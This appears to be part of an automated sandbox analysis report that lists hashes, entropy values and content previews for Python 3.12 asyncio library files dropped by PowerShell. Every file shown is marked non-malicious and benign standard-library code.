                                                                                                    Preview:.........U.f.#........................@.....d.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.........Z.y.).)...TaskGroup.....)...events)...exceptions)...tasksc.....................R.....e.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d.d.d...d...Z.d.e.d.e.f.d...Z.d...Z.d...Z.y.).r....a9...Asynchronous context manager for managing groups of tasks... Example use:.. async with asyncio.TaskGroup() as group:. task1 = group.create_task(some_coroutine(...)). task2 = group.create_task(other_coroutine(...)). print("Both tasks have completed now.").. All tasks are awaited when the context manager exits... Any exceptions other than `asyncio.CancelledError` raised within. a task will cancel all remaining tasks and wait for them to exit.. The exceptions are then combined and raised as an `ExceptionGroup`.. c..........................d.|._.........d.|._.........d.|._.........d.|._.........d.|._.........d.|._.........t.................|._.........g.|._.....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):40410
                                                                                                    Entropy (8bit):5.355698424090167
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:fUzd7mWOqwRn3J0IDjXpmNX7IdvIZaIeTUQ5jt7RWTXFU9Zq02yOX4SZdN5K:A7m3fVw8vCdQ5jtNWTXgqcWtK
                                                                                                    MD5:900F7EF8B3312B915FE8FBAD430CFEBD
                                                                                                    SHA1:82FDB135A8281A3A6B6D5D5EF4A6321C5A641BFB
                                                                                                    SHA-256:E70F3CCA061AAB841E9BB8D4E604C781222B94876E2715680DE3681C28102429
                                                                                                    SHA-512:5326E1B256A1CFA19A20E515EB41C89F7FF8BC21A4022DBEEC395273E7A7D8BCB47D9671678DDDC3FC4D3E7B8C13539F1E67470FB439004345A8C743D73D7EEE
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f...............................d.Z.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j&..................d.........j(..................Z.d/d...Z.d/d...Z.d...Z...G.d...d.e.j2..........................Z.e.Z...d.d.l.Z.e.j4..................x.Z.Z.d.d.d...d...Z.e.j"..................j@..................Z e.j"..................jB..................Z!e.j"..................jD..................Z"d.e"d...d...Z#d...Z$d...Z%d...Z&d...Z'd.d...d...Z(e.jR..................d...........Z*d/d...Z+d.d...d...Z,..G.d...d e.jZ..........................Z.d!d"..d#..Z/d$..Z0d%..Z1d&..Z2..e2e.........Z3..e.jh..........................Z5..e6........Z7i.Z8d'..Z9d(..Z:d)..Z;d*..Z<d+..Z=d,..Z>d-..Z?e.Z@e9ZAe:ZBe>ZCe?ZDe;ZEe<ZFe=ZG..d.d.l.m9Z9m:Z:m>Z>m?Z?m;Z;m<Z<m=Z=m5Z5m7Z7m8Z8m.Z...e.ZHe9ZIe:ZJe>ZKe?ZLe;ZMe<ZNe=ZOy.#.e.$.r...Y.....w.x.Y.w.#.e.$.r...Y.y.w.x.Y.w.)0z0Support for tasks, coroutines and
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1297
                                                                                                    Entropy (8bit):5.415351090707412
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:hpopsp94geTtRaPiXnN9PjcoWjYfKbZ6WCG7BuT1XOdGHNyxlSUw:Pzp9sna6XN9OjokMGABO6Nyz9w
                                                                                                    MD5:3AF450E30ADDE54C1F3DC2E698D07B4D
                                                                                                    SHA1:454ACEA27EB9A17195B51D42ED10C8BC5829B617
                                                                                                    SHA-256:0CAA377429426F879525C42119174240A4F4496381BC184D0A0B42F3F2AFD129
                                                                                                    SHA-512:7F39D4947AC560D2C813E8AD47E61A5AE5BAA321426F1B062F26C4545F65BC485E23A5E949B52CC7055EDB7D68ACDEF4B813829EB988C33FCDD5333C39E34F82
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f/...............................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.Z.d...Z.y.).z6High-level support for working with threads in asyncio.....N.....)...events)...to_threadc.........................K.....t.........j...........................}.t.........j...........................}.t.........j...................|.j...................|.g.|.....i.|.....}.|.j...................d.|...........d.{...........S.7.....w.).a....Asynchronously run function *func* in a separate thread... Any *args and **kwargs supplied for this function are directly passed. to *func*. Also, the current :class:`contextvars.Context` is propagated,. allowing context variables from the main thread to be accessed in the. separate thread... Return a coroutine that can be awaited to get the eventual result of *func*.. N).r......get_running_loop..contextvars..copy_context..functools..partial..run..run_in_executor)...func..args..kwargs..loop..ctx..func_calls.... .MC:\Users\boadi\AppData\Loca
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7836
                                                                                                    Entropy (8bit):5.119169702626434
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Me6jaWnVRycKLTBqY7y7sNfkBtp1pZ4slWeoVwApKSkdqM0nltOqeBKXfoTGfo+X:Me6pVQcKvcRqVwAKSkdqjltleooor3
                                                                                                    MD5:E5548A23D4CCABDBD1153BF4B89E0D20
                                                                                                    SHA1:07A97D637E46645F641BE4EA180398A17481DD12
                                                                                                    SHA-256:768C44B9892BEB97376248E23ECD32C0754C966974D6401F28ED9C5A7C8B0E92
                                                                                                    SHA-512:8E9F7B8658B42E5390DF641C7878C7937AA4B915F7D0C05F80FDC80BC8AE7DC65892332CDAC2131951096B6A0C26C3567C91CF26BECF99E0E3D885EE5E0475C5
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fq...............................d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z...G.d...d.e.j...........................Z.e...G.d...d.................Z.d.e.e.....d.e.f.d...Z.d.e.e.....d.e.f.d...Z.y.)......N)...TracebackType)...final..Optional..Type.....)...events)...exceptions)...tasks)...Timeout..timeout..timeout_atc..................... .....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.y.)..._State..created..active..expiring..expired..finishedN)...__name__..__module__..__qualname__..CREATED..ENTERED..EXPIRING..EXPIRED..EXITED........NC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\timeouts.pyr....r........s..........G....G....H....G....Fr....r....c..........................e.Z.d.Z.d.Z.d.e.e.....d.d.f.d...Z.d.e.e.....f.d...Z.d.e.e.....d.d.f.d...Z.d.e.f.d...Z.d.e.f.d...Z.d.d...Z.d.e.e.e.........d.e.e.....d.e.e.....d.e.e.....f.d...Z.d.d...Z.y.).r....z.Asynchronous context manager for cancelling overdue coroutines... Use `timeout()` or `t
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14043
                                                                                                    Entropy (8bit):5.155991593218318
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:mIvugvhlK/JL7kgxWepAZ9UpihFOIDL8C9xjGD9BjS9GH:Zvugv2phpSIYxaD3eI
                                                                                                    MD5:52F7BB6D14EDD73E0694AF7A1B6316C8
                                                                                                    SHA1:F76EE9BBD5538FF0E0534BD47D466F43F439E9A8
                                                                                                    SHA-256:F23B6FB9B4726588B99343060C361E210135672B4203F6B1431B487A7522DD6D
                                                                                                    SHA-512:E77E7142F29C031E3511ECBEABBCAA48D3C01A7825BCAF3C6FFFE949777049E67EF3E01A41D19EDB0B679D76714A31AAF5EBE4B9C2BEE7C38D581BE02D682BD2
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f1+.............................d.Z.d.Z...G.d...d.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z...G.d...d.e.........Z.y.).z.Abstract Transport class.)...BaseTransport..ReadTransport..WriteTransport..Transport..DatagramTransport..SubprocessTransportc.....................<.....e.Z.d.Z.d.Z.d.Z.d.d...Z.d.d...Z.d...Z.d...Z.d...Z.d...Z.y.).r....z.Base class for transports....._extraNc...........................|...i.}.|.|._.........y...Nr....)...self..extras.... .PC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\transports.py..__init__z.BaseTransport.__init__....s..........=....E............c.....................:.....|.j...................j...................|.|.........S.).z#Get optional transport information.).r......get).r......name..defaults.... r......get_extra_infoz.BaseTransport.get_extra_info....s..........{.{.....t.W..-..-r....c...........................t...........).z2Retu
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):5118
                                                                                                    Entropy (8bit):4.872473337402859
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:Z5ulghtN76WQOUvToPc1f3O0DW93Y9VbDUGoGlU:Z0gh5Ubkqf3O0o34OElU
                                                                                                    MD5:29D406C1C02B39EFAE7E7EC17F57F3AA
                                                                                                    SHA1:DB451D91789B3047893D5E8EB70580608852D191
                                                                                                    SHA-256:BA5A7B0E732D6A080860E1F25F34DB6DE40169D15B79D05BC823C6F91B9E9DD3
                                                                                                    SHA-512:51F720B45B035B93D0C504C60EBF2C15CC5CE105B58658FB6E965A667FCD641D3B7165728BBE0EA6B0EB55F0F4D3D8493E68A77EC60F6468048BB368E0188783
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f.......................... .....d.d.l.Z...G.d...d.........Z.y.)......Nc..........................e.Z.d.Z.d.Z.d.Z.d.e.j...................f.d...Z.e.d...........Z.e.d...........Z.e.d...........Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...TransportSocketz.A socket-like wrapper for exposing real transport sockets... These objects can be safely returned by APIs like. `transport.get_extra_info('socket')`. All potentially disruptive. operations (like "socket.close()") are banned.. ...._sock..sockc...........................|.|._.........y...Nr....)...selfr....s.... .LC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\asyncio\trsock.py..__init__z.TransportSocket.__init__....s..................c...........................|.j...................j...................S.r....).r......family..r....s.... r....r....z.TransportSocket.family....s..........z.z.. .. .. r....c...........................|.j...................j..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):41578
                                                                                                    Entropy (8bit):4.987358035527655
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:768:PFQLoHRtLfPy8xgn+u1HSUc+YrMrPCxvJV3nxiwSvP/U1n:iLUtLfPGIUc+Ajxx+wJF
                                                                                                    MD5:3582820DFDF1BC8F134A9E172A7590E3
                                                                                                    SHA1:88FBE0A62D685EAA38326C8B0506F8D1535B3AF9
                                                                                                    SHA-256:FFF0BCB9BA9641B5CD7FEABEBFB0F34BD128286EF0BDD44A8F6FBFE24B2B633F
                                                                                                    SHA-512:2C7F541762ECFB80FCC8638B19052AF64C01AA8E22ECAF60903657E1B60E2ED97CBE2E8E29A9B806A0D978CD501149F38BC20B9897C0F5159E9C7F7A2C0CB767
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.f...............................d.Z.d.d.l.Z.e.j...................d.k7..r...e.d...........d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.e.j6..................Z.e.j8..................Z.d.Z.d.Z.d.Z.d.Z ..G.d...d.e.jB..........................Z"..G.d...d.e.jB..........................Z#..G.d...d.e#........Z$..G.d...d.e#........Z%..G.d...d.e&........Z'..G.d...d e.jP..........................Z)..G.d!..d"e.jT..........................Z+..G.d#..d$........Z,..G.d%..d&e.jZ..........................Z.e)Z/..G.d'..d(e.j`..........................Z1..G.d)..d*e.j`..........................Z2e2Z3y.)+z.Selector and proactor event loops for Windows......N..win32z.win32 only)...partial.....)...events)...base_subprocess)...futures)...exceptions)...proactor_events)...selector_events)...tasks)...windows_utils)...logger)...SelectorEventLoop..Proact
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):7377
                                                                                                    Entropy (8bit):5.254574499827267
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:fe1gZ4ewryeKwF56QCg5yFBcLJlwesyxZ/swKSsG7RZ2TKqiu0wv:GteEAeB5yFBcllVsW/gSZRmFiU
                                                                                                    MD5:671FF9BB01B1CC1DE46D51F94212491D
                                                                                                    SHA1:C7D0D1A4A05529DC3CC0CCB423F674A39BF13607
                                                                                                    SHA-256:9083B51ACC5D3EB4742FB7D7575A2A93416B8ACAB7E26213767DFA4BEEEB90C6
                                                                                                    SHA-512:3D3938DB156B208015FFD504F91355102CF21B4FAECC0986DBC69B5C3B402737B7A67F8C1BC989A64F1D00C16FBB0FE90FE7B82F781631131DA8B4DA014EB52A
                                                                                                    Malicious:false
                                                                                                    Preview:.........U.fq...............................d.Z.d.d.l.Z.e.j...................d.k7..r...e.d...........d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.Z.d.Z.e.j...................Z.e.j...................Z...e.j...........................Z.d.d.e.d...d...Z...G.d...d.........Z...G.d...d.e.j&..........................Z.y.).z)Various Windows specific bits and pieces......N..win32z.win32 only)...pipe..Popen..PIPE..PipeHandlei. ..F).TT)...duplex..overlapped..bufsizec..........................t.........j...................d.j...................t.........j...........................t.........t...................................}.|.r6t.........j...................}.t.........j...................t.........j...................z...}.|.|.}.}.n$t.........j...................}.t.........j...................}.d.|.}.}.|.t.........j...................z...}.|.d.....r.|.t.........j...................z...}.|.d.....r.t.........j...................}.n.d.}.d.x.}.}...t.........j...................|.|.
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):79983
                                                                                                    Entropy (8bit):4.278999613826372
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:1536:vD1f1xBrs8GWPB0v41J7XLR+QQ8q7OAWJJ2Qu3DyEcy:vD1PU41J7XLR+H8q7OZmQu3+e
                                                                                                    MD5:E4DA1F5E5B7267BA5CE63C72AE2B2901
                                                                                                    SHA1:44219D357396F048941417C48D9B83A2B9629BC4
                                                                                                    SHA-256:C0FC43FEC379C16C699FF752D796F320DB23DB4FEDE62DDAA425621F8D40E091
                                                                                                    SHA-512:F626C4A7CEA54B1AB8FF5F40CDBBBB635D22BB757BEF75CE398F790D10C90886E9BD6E7F198E228B61388115166FD517F521C9F97C2773645B176828DA91C4BD
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Base implementation of event loop.....The event loop can be broken up into a multiplexer (the part..responsible for notifying us of I/O events) and the event loop proper,..which wraps a multiplexer with functionality for scheduling callbacks,..immediately or at a given time in the future.....Whenever a public API takes a callback, subsequent positional..arguments will be passed to the callback if/when it is called. This..avoids the proliferation of trivial lambdas implementing closures...Keyword arguments for the callback are not supported; this is a..conscious design decision, leaving the door open for keyword arguments..to modify the meaning of the API call itself..."""....import collections..import collections.abc..import concurrent.futures..import errno..import functools..import heapq..import itertools..import os..import socket..import stat..import subprocess..import threading..import time..import traceback..import sys..import warnings..import weakref....try:.. import ssl..e
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2041
                                                                                                    Entropy (8bit):4.759846621359345
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:bNCRipB7FG3NtCPfOM3TW+yWzpbhTPUXUKyRbb2ubp:bN1euZPzpbp/H2uF
                                                                                                    MD5:E6FEE06D3293BF447C5319CF7E90253C
                                                                                                    SHA1:E3B23D2010282969C9B519B14A7AE0DC0E48F88F
                                                                                                    SHA-256:0810F0D05A8BB85DFD42FE17A93949B7C425D1E6E2BC21D35EB56A1895923591
                                                                                                    SHA-512:4544DACF5D25ADCA0E341BEBF116E50BF20180025DB97A3F1A82BF91B373D8A784044A5D4E93DADA1F76C81C2B51944CAD2EF496C06178A001A91A783C079A0B
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:__all__ = ()....import reprlib....from . import format_helpers....# States for Future..._PENDING = 'PENDING'.._CANCELLED = 'CANCELLED'.._FINISHED = 'FINISHED'......def isfuture(obj):.. """Check for a Future..... This returns True when obj is a Future instance or is advertising.. itself as duck-type compatible by setting _asyncio_future_blocking... See comment in Future for more details... """.. return (hasattr(obj.__class__, '_asyncio_future_blocking') and.. obj._asyncio_future_blocking is not None)......def _format_callbacks(cb):.. """helper function for Future.__repr__""".. size = len(cb).. if not size:.. cb = ''.... def format_cb(callback):.. return format_helpers._format_callback_source(callback, ()).... if size == 1:.. cb = format_cb(cb[0][0]).. elif size == 2:.. cb = '{}, {}'.format(format_cb(cb[0][0]), format_cb(cb[1][0])).. elif size > 2:.. cb = '{}, <{} more>, {}'.format(format_cb(cb[0][0]),..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9154
                                                                                                    Entropy (8bit):4.246808313092359
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:lszIZ8MLHzG3Brs9pIKrlNtdpnqxfPx1BKV2icfn/CfcrPQh/Km:zZxK3pYplNtdNO74sn//PQh/5
                                                                                                    MD5:71590A7A9F7AADD1CCA4016CADC4762B
                                                                                                    SHA1:4D7722FE0221A2E3AAA42496DE2521DE53DE7C17
                                                                                                    SHA-256:0E07C6D91C88E3F2E587E5EDCEB9F14D6C9AFDF9F55BCDBC6610AD1BCDE93DF7
                                                                                                    SHA-512:8A6BEFE6EC48F87184B355B9DC59F6540DDEA2F356B9FFD60E903229640874CB210E9F1945219D88C7C8FD6970260B4C34CD98F399ACC9A42ECFED3B84EE42C2
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import collections..import subprocess..import warnings....from . import protocols..from . import transports..from .log import logger......class BaseSubprocessTransport(transports.SubprocessTransport):.... def __init__(self, loop, protocol, args, shell,.. stdin, stdout, stderr, bufsize,.. waiter=None, extra=None, **kwargs):.. super().__init__(extra).. self._closed = False.. self._protocol = protocol.. self._loop = loop.. self._proc = None.. self._pid = None.. self._returncode = None.. self._exit_waiters = [].. self._pending_calls = collections.deque().. self._pipes = {}.. self._finished = False.... if stdin == subprocess.PIPE:.. self._pipes[0] = None.. if stdout == subprocess.PIPE:.. self._pipes[1] = None.. if stderr == subprocess.PIPE:.. self._pipes[2] = None.... # Create the child process: set the _proc attribute..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2766
                                                                                                    Entropy (8bit):4.3810657729743125
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:MDlb5wrzh0hBDgNuheP0PxxbycJw2O+wJouDpi4w8L2WvK7:MDl9kz6dg4gPw9ycJw2luD3w8L2yw
                                                                                                    MD5:E99B961F73887CC1085158CA75524175
                                                                                                    SHA1:E78A72B15598531C2526C8D1A832C6DF14108846
                                                                                                    SHA-256:109DE315ED020E85261B741987719CFD3888F14BC9DDA9C846BDA3ECB6B24B4A
                                                                                                    SHA-512:D6B87AC813EFFE058197D5A80033FF78EDA3C6ACE561C461048031FAED60CA5C49E156D145B247E4832BD2C6593CD161F59F5B7DB7629E5CECA5E2E5D20A1894
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:import linecache..import reprlib..import traceback....from . import base_futures..from . import coroutines......def _task_repr_info(task):.. info = base_futures._future_repr_info(task).... if task.cancelling() and not task.done():.. # replace status.. info[0] = 'cancelling'.... info.insert(1, 'name=%r' % task.get_name()).... if task._fut_waiter is not None:.. info.insert(2, f'wait_for={task._fut_waiter!r}').... if task._coro:.. coro = coroutines._format_coroutine(task._coro).. info.insert(2, f'coro=<{coro}>').... return info......@reprlib.recursive_repr()..def _task_repr(task):.. info = ' '.join(_task_repr_info(task)).. return f'<{task.__class__.__name__} {info}>'......def _task_get_stack(task, limit):.. frames = [].. if hasattr(task._coro, 'cr_frame'):.. # case 1: 'async def' coroutines.. f = task._coro.cr_frame.. elif hasattr(task._coro, 'gi_frame'):.. # case 2: legacy coroutines.. f = tas
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1454
                                                                                                    Entropy (8bit):5.367936833312057
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:lOkxD1CxjkkazhtNRHQVTLHhAWyVUqb1j+MMzV730JGvHApb/f:4kxJXhtD6hAWY7RCM2T0JGvHKf
                                                                                                    MD5:BBB0FAB3785CCA738C7606C3621377E7
                                                                                                    SHA1:55E9A98EA91C99FA1DD556736C772AF4B30B999E
                                                                                                    SHA-256:A577B5C92227F378A26048E1985821E973125B42C385A5AA4A44BB92B2C6F26E
                                                                                                    SHA-512:7F45394870FF89170020D5B45FC4DE3F3C481B7493C199336D8E279F479D7F05A96727A87DB151FF14D14B1A74A3EB241CBB7D8C4D152B21F83126613FFA60EB
                                                                                                    Malicious:false
                                                                                                    Preview:# Contains code from https://github.com/MagicStack/uvloop/tree/v0.16.0..# SPDX-License-Identifier: PSF-2.0 AND (MIT OR Apache-2.0)..# SPDX-FileCopyrightText: Copyright (c) 2015-2021 MagicStack Inc. http://magic.io....import enum....# After the connection is lost, log warnings after this many write()s...LOG_THRESHOLD_FOR_CONNLOST_WRITES = 5....# Seconds to wait before retrying accept()...ACCEPT_RETRY_DELAY = 1....# Number of stack entries to capture in debug mode...# The larger the number, the slower the operation in debug mode..# (see extract_stack() in format_helpers.py)...DEBUG_STACK_DEPTH = 10....# Number of seconds to wait for SSL handshake to complete..# The default timeout matches that of Nginx...SSL_HANDSHAKE_TIMEOUT = 60.0....# Number of seconds to wait for SSL shutdown to complete..# The default timeout mimics lingering_time..SSL_SHUTDOWN_TIMEOUT = 30.0....# Used in sendfile fallback code. We use fallback for platforms..# that don't support sendfile, or for TLS connections..
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):3451
                                                                                                    Entropy (8bit):4.549456018985705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:I+hQMzMBTJpOqy6f86c7XFNry/ORKsoSSS35prVq/sP0O4H2aFEhU:FhQMzmTJpOl6E6F/gKsgDspiEhU
                                                                                                    MD5:0EC37E7EAB161709F0703A323DB49B5D
                                                                                                    SHA1:08D953E48993A59A7AE54BAC31387699EAB57715
                                                                                                    SHA-256:0CC38E59C555C22CA601AED90A4065E2B7C56EFE8B8EF6A693F4D0426E45D76A
                                                                                                    SHA-512:020F23FCAD07CC15DBF2170C93F68D737614DB4BE6C42F42417647A83D32625DF1A1CE390293A01DD0D4158267A2C8C1CF13B7008F5577CA8172376FA9E9636E
                                                                                                    Malicious:false
                                                                                                    Preview:__all__ = 'iscoroutinefunction', 'iscoroutine'....import collections.abc..import inspect..import os..import sys..import types......def _is_debug_mode():.. # See: https://docs.python.org/3/library/asyncio-dev.html#asyncio-debug-mode... return sys.flags.dev_mode or (not sys.flags.ignore_environment and.. bool(os.environ.get('PYTHONASYNCIODEBUG')))......# A marker for iscoroutinefunction..._is_coroutine = object()......def iscoroutinefunction(func):.. """Return True if func is a decorated coroutine function.""".. return (inspect.iscoroutinefunction(func) or.. getattr(func, '_is_coroutine', None) is _is_coroutine)......# Prioritize native coroutine check to speed-up..# asyncio.iscoroutine..._COROUTINE_TYPES = (types.CoroutineType, collections.abc.Coroutine).._iscoroutine_typecache = set()......def iscoroutine(obj):.. """Return True if obj is a coroutine object.""".. if type(obj) in _iscoroutine_typecache:.. return True...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):30207
                                                                                                    Entropy (8bit):4.503601678489958
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:384:G6h/n+ARDPUvN7NcD+f2B4XAZ8AzL23EbZhB5xOV+yRWWePoWFg:G6hv+ImJcD+fTXApG34ZhB52+mWWtWFg
                                                                                                    MD5:B41C12F1A5E0B6365977DC69ABFF9A25
                                                                                                    SHA1:3E52F2B03C11C90E861505F87CB47644C4EA3417
                                                                                                    SHA-256:F9A88DE38355AD2F6B5F0DE70DBD4694DA0D9F92831734868C026DAA4CAF8F54
                                                                                                    SHA-512:F4DFAFE3B969A67CF12F3FB331094887CC8ECECA99B35C329C94A060032F4F65764F8C5AC7081849224036FE80BA2EE270E772CFBEBEBC768156FB52E722E653
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""Event loop and event loop policy."""....# Contains code from https://github.com/MagicStack/uvloop/tree/v0.16.0..# SPDX-License-Identifier: PSF-2.0 AND (MIT OR Apache-2.0)..# SPDX-FileCopyrightText: Copyright (c) 2015-2021 MagicStack Inc. http://magic.io....__all__ = (.. 'AbstractEventLoopPolicy',.. 'AbstractEventLoop', 'AbstractServer',.. 'Handle', 'TimerHandle',.. 'get_event_loop_policy', 'set_event_loop_policy',.. 'get_event_loop', 'set_event_loop', 'new_event_loop',.. 'get_child_watcher', 'set_child_watcher',.. '_set_running_loop', 'get_running_loop',.. '_get_running_loop',..)....import contextvars..import os..import signal..import socket..import subprocess..import sys..import threading....from . import format_helpers......class Handle:.. """Object returned by callback registration methods.""".... __slots__ = ('_callback', '_args', '_cancelled', '_loop',.. '_source_traceback', '_repr', '__weakref__',.. '_context')....
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1814
                                                                                                    Entropy (8bit):4.664597808201475
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:Ad3QZbzX+MkvODzN3Z1zULxID+XvsaAWl2iyjDzPfgEBF6R9TaAs3hxER:iAJrzOMXzULxy+/sa/l2nzP4EMaBhxER
                                                                                                    MD5:23C13351D6533C00C8E7707467D75E8A
                                                                                                    SHA1:DEBE33F3B0AD9A330B90B2271E737646839814BE
                                                                                                    SHA-256:A49AA2489262C47EE91528550EF464F1139E873DD5F1A3F18C3C099A0145E195
                                                                                                    SHA-512:4D7AA609DCEFF0879B42B02C5985A550E85AD8B78AA33C0A3744B2DEC303BFAB7BD6D27662BC1B816E346E49B9466D6913F93B7D2ED10165C83AC261DEECC31A
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview:"""asyncio exceptions."""......__all__ = ('BrokenBarrierError',.. 'CancelledError', 'InvalidStateError', 'TimeoutError',.. 'IncompleteReadError', 'LimitOverrunError',.. 'SendfileNotAvailableError')......class CancelledError(BaseException):.. """The Future or Task was cancelled."""......TimeoutError = TimeoutError # make local alias for the standard exception......class InvalidStateError(Exception):.. """The operation is not allowed in this state."""......class SendfileNotAvailableError(RuntimeError):.. """Sendfile syscall is not available..... Raised if OS does not support sendfile syscall for given socket or.. file type... """......class IncompleteReadError(EOFError):.. """.. Incomplete read error. Attributes:.... - partial: read bytes string before the end of stream was reached.. - expected: total number of expected bytes (or None if unknown).. """.. def __init__(self, partial, expected):.. r_expected = 'undefi
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2480
                                                                                                    Entropy (8bit):4.6056367555974065
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:g863N4N9017WBmO9uMxP6U8QtUUIKOxYJCd67PiJQUhAs42eDv4mQ0L0j:g863NC9IiBmKxiUlWVKPJCs7oQUhANLi
                                                                                                    MD5:64D0BFEF9B45C0EA83D954360F021869
                                                                                                    SHA1:1BD55E0614613C37EADBD77188962F3BD5F28E30
                                                                                                    SHA-256:657449627E8706CDC28A575DF9E975058E787FA2CC6A70B5DA7F9EB39D371DCB
                                                                                                    SHA-512:23583958AAFD449B0B9991A0CFE569092D22684464F4DB3400C8E56B22CE127C0E73E94D59C976ECC40A70F2FE850164DF7AAB1A147629AF45BC7145B1C6BE9D
                                                                                                    Malicious:false
                                                                                                    Antivirus:
